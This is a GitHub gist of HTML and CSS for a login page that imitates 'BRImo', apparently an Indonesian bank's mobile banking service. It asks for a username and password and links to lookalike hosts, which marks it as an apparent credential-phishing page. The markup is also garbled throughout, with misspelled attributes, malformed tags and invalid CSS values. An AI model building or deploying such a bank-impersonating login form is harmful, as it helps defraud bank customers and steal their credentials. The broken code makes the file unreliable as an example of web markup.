brimologin
Created
October 2, 2022 15:02
-
-
Save BANKBRimo/31c987ebcde940336da286c2f3f07d76 to your computer and use it in GitHub Desktop.
BRimobybri
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPEhtml> | |
| <html lang="en"> | |
| <meta charset="utf-8"> | |
| <meta name="viewport" | |
| content="width=device-width, initial=scale-1.0"> | |
| <link="styless.css"> | |
| <rel="styless.css"> | |
| <figure="wp-img-width-full-size"> | |
| <img src="https://brimocom-ba0d27.ingress-daribow.ewp.live/wp-content/uploads/2022/08/IMG_20220709_202817.jpg" alt="" class="wp-image-15" width="360" height="349"/> | |
| <form action"/action_page.php" | |
| menthod="post"> | |
| <div class="container"> | |
| <label for="uname"><b></b></label> | |
| <input type="text" placeholder="👤 UserName :" name="uname" required="> | |
| <label for="psw"> | |
| <input type="password" placeholder="🔒 Password :" name="password"required"> | |
| </div> | |
| <div class="container" style="background-color:f1f1f1"> | |
| <span class="psw">Lupa <a href="https://brimo-co-id-b7f4eb.ingress-comporellon.ewp.live/34-2/">Password?</a></span> | |
| <button type="button" class="link"><a href="https://brimo-co-id-b7f4eb.ingress-comporellon.ewp.live/14-2/">LOGIN</a></button><a href="https://brimo-co-id-b7f4eb.ingress-comporellon.ewp.live/14-2/"> | |
| </a></div> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <style> | |
| body {font-family: Areal, Helvetica, sans-serif;} | |
| /* Full width input field */ | |
| input[type=text], input[type=password] | |
| { | |
| width: 90%; | |
| padding: 18px 23px; | |
| margin: 0px 6; | |
| display: inline-block; | |
| border-radius: 8px; | |
| border: 1px solid #ccc; | |
| box-sizing: border-box; | |
| } | |
| /* Set a style for all button */ | |
| button { | |
| background-color: DodgerBlue; | |
| color: white; | |
| padding: 20px 18px; | |
| margin: 15px 0; | |
| border: none; | |
| border-radius: 8px; | |
| cursor: pointer; | |
| width: 90%; | |
| } | |
| button:hover { | |
| opacity: 0,8; | |
| } | |
| /* Extra style for the cancel button */ | |
| .cancelbtn { | |
| width: auto; | |
| padding: 16px 18px; | |
| background-color: DodgerBlue; | |
| } | |
| /* Center the image and position the close button */ | |
| .imgcontainer { | |
| text-align: center; | |
| margin: 24px 0 12px 0; | |
| position: relative; | |
| } | |
| span.psw { | |
| float: right; | |
| padding-top: 16px; | |
| } | |
| /* The modal (background) */ | |
| .modal { | |
| display: none; /* Hidden by default */ | |
| Position: fixed; /* Stay in place */ | |
| z-index: 1; /* Sit on top */ | |
| left: 0; | |
| top: 0; | |
| width: 100%; /* Full width */ | |
| height: 100%; /* Full height */ | |
| overflow: auto; /* Enable scroll if needed */ | |
| background-color: rgb(0,0,0); /* Fallback color */ | |
| background-color: rgb(0,0,0,0,4); /* Black w/ opacity */ | |
| padding-top: 60px; | |
| } | |
| /* Modal content/content_page.php*/ | |
| .modal-content { | |
| background-color: #fefefe; | |
| margin: 5% auto 15% auto; /* 5% form the top, 15% form the bottom and centered */ | |
| border: 1px solid #888; | |
| width: 10%; /* Could be more or less, depending on screen size */ | |
| } | |
| position: absolute; | |
| right: 25px; | |
| top: 0; | |
| color: #000; | |
| font-size: 35px; | |
| font-weight: blod; | |
| } | |
| .close:hover, | |
| .close:pocus { | |
| color: (0); | |
| cursor: pointer; | |
| } | |
| /* Change style for span and cancel button on extra small screens */ | |
| @media screen and (max-width: 300px) { | |
| span.psw { | |
| display: block; | |
| float: none; | |
| } | |
| <ul> | |
| </style> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment